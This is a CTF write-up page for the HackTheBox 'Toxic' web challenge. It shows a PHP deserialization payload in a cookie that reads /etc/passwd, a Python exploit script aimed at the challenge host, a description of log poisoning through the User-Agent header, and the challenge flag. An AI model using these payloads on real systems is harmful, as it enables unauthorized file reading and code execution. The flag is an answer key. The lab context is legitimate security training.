Writeups
  • Writeups
  • CTF Writeups
  • HTB
  • Others
    • Academy Box - PEH Capstone TCM Security
  • Other Challenges
  • Others
    • Saptang Labs Hiring Challenge
  • CTF
    • ctfs
      • BRCTF
  • CTF
    • ctfs
      • CloudSEK - BSides Cyber Security CTF 2023
  • CTF
    • ctfs
      • CloudSEK - Nullcon Cyber Security CTF 2023
  • CTF
    • ctfs
      • CyberHavoc CTF 2023
  • CTF
    • ctfs
      • Cyber Heroines CTF
  • CTF
    • ctfs
      • IWCON CTF 2023
  • CTF
    • ctfs
      • SecurityBoat - October CTF 2023
  • CTF
    • ctfs
      • The Hacker101 CTF
  • CTF
    • ctfs
      • Wizer CTF Event 6 Hour Challenge
  • CTF
    • files
  • HTB
    • Challenges
      • Baby Time Capsule
  • HTB
    • Challenges
      • Lost Modulus
  • HTB
    • HTB Challenges
  • HTB
    • Challenges
      • RLotto
  • HTB
    • Challenges
      • Toxic | HTB Web Challenge
  • HTB
    • Challenges
      • xorxorxor
  • HTB
    • Machines
      • HTB Machine Precious
  • HTB
    • HTB Machines
  • HTB
    • Machines
      • HTB Machine Stocker
  • CTF
    • ctfs
      • FooBar CTF 2023
  • CTF
    • ctfs
      • Lag and Crash 3.0
  • CTF
    • ctfs
      • NahamCon_CTF_2022
        • Crash Override:
  • CTF
    • ctfs
      • NahamCon_CTF_2022
        • Exit Vim:
  • CTF
    • ctfs
      • NahamCon_CTF_2022
        • Flagcat:
  • CTF
    • ctfs
      • NahamCon_CTF_2022
        • Flaskmetal Alchemist:
  • CTF
    • ctfs
      • NahamCon_CTF_2022
        • Personnel:
  • CTF
    • ctfs
      • NahamCon_CTF_2022
        • Poller:
  • CTF
    • ctfs
      • NahamCon_CTF_2022
        • Prisoner:
  • CTF
    • ctfs
      • NahamCon_CTF_2022
        • Quirky:
  • CTF
    • ctfs
      • NahamCon_CTF_2022
        • Read The Rules:
  • CTF
    • ctfs
      • NahamCon CTF 2022
  • CTF
    • ctfs
      • NahamCon_CTF_2022
        • Technical Support:
  • CTF
    • ctfs
      • NahamCon_CTF_2022
        • Wizard:
  • CTF
    • ctfs
      • picoCTF
  • CTF
    • ctfs
      • picoCTF
        • crypto
          • Easy Peasy
  • CTF
    • ctfs
      • picoCTF
        • crypto
Powered by GitBook
On this page

Was this helpful?

  1. HTB
  2. Challenges

Toxic | HTB Web Challenge

PreviousChallengesNextHTB

Last updated 1 year ago

Was this helpful?

Web

In the given source code we can spot that it is vulnerable to deserialization

PageModel have magic method __destruct() to exploite Deserialization

payload=

O:9:"PageModel":1:{s:4:"file";s:11:"/etc/passwd";}
import requests
from itsdangerous import base64_encode

a = "PageModel"
b = "/etc/passwd"
payload = 'O:'+str(len(a))+':"'+a+'":1:{s:4:"file";s:'+str(len(b))+':"'+b+'";}'
payload = base64_encode(payload).decode()
r = requests.get("http://83.136.249.57:52345/",cookies={"PHPSESSID": payload},proxies={"http":"http://127.0.0.1:8080/"})
print(r.text)

The flag name is random so we need to find a way around

we can find the path of /etc/nginx/nginx.conf in Dockerfile

Reading this file we get the path to access log /var/log/nginx/access.log

In access log we see that User-agent is printed

We can try injecting php code:

and it works 🥲 Let's get flag

Flag: HTB{P0i5on_1n_Cyb3r_W4rF4R3?!}

:octocat: Happy Hacking :octocat: